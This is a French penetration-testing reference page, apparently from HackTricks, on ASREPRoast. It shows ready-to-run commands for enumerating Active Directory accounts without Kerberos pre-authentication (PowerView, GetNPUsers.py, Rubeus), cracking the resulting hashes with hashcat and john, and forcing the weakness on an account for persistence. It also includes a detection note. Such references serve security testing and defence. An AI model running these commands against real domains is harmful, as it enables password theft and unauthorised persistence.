4.6 KiB
ASREPRoast
L'attaque ASREPRoast recherche les utilisateurs sans l'attribut requis de pré-authentification Kerberos (DONT_REQ_PREAUTH).
Cela signifie que n'importe qui peut envoyer une demande AS_REQ au DC au nom de l'un de ces utilisateurs et recevoir un message AS_REP. Ce dernier type de message contient un bloc de données chiffré avec la clé utilisateur d'origine, dérivée de son mot de passe. Ensuite, en utilisant ce message, le mot de passe de l'utilisateur pourrait être craqué hors ligne.
De plus, aucun compte de domaine n'est nécessaire pour effectuer cette attaque, seulement une connexion au DC. Cependant, avec un compte de domaine, une requête LDAP peut être utilisée pour récupérer les utilisateurs sans pré-authentification Kerberos dans le domaine. Sinon, les noms d'utilisateur doivent être devinés.
Énumération des utilisateurs vulnérables (nécessite des informations d'identification de domaine)
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
Demande de message AS_REP
{% code title="Utilisation de Linux" %}
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
{% code title="Utilisation de Windows" %}
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
{% endcode %}
{% hint style="warning" %} La technique de l'AS-REP Roasting avec Rubeus générera un événement 4768 avec un type de chiffrement de 0x17 et un type de préauthentification de 0. {% endhint %}
Craquage
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
Persistance
Forcer la non-exigence de preauth pour un utilisateur pour lequel vous avez les permissions GenericAll (ou les permissions pour écrire des propriétés):
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Références
Plus d'informations sur le Roasting AS-RRP sur ired.team
Suivez HackenProof pour en savoir plus sur les bugs web3
🐞 Lisez des tutoriels sur les bugs web3
🔔 Soyez informé des nouveaux programmes de primes pour bugs
💬 Participez aux discussions de la communauté
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFTs
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.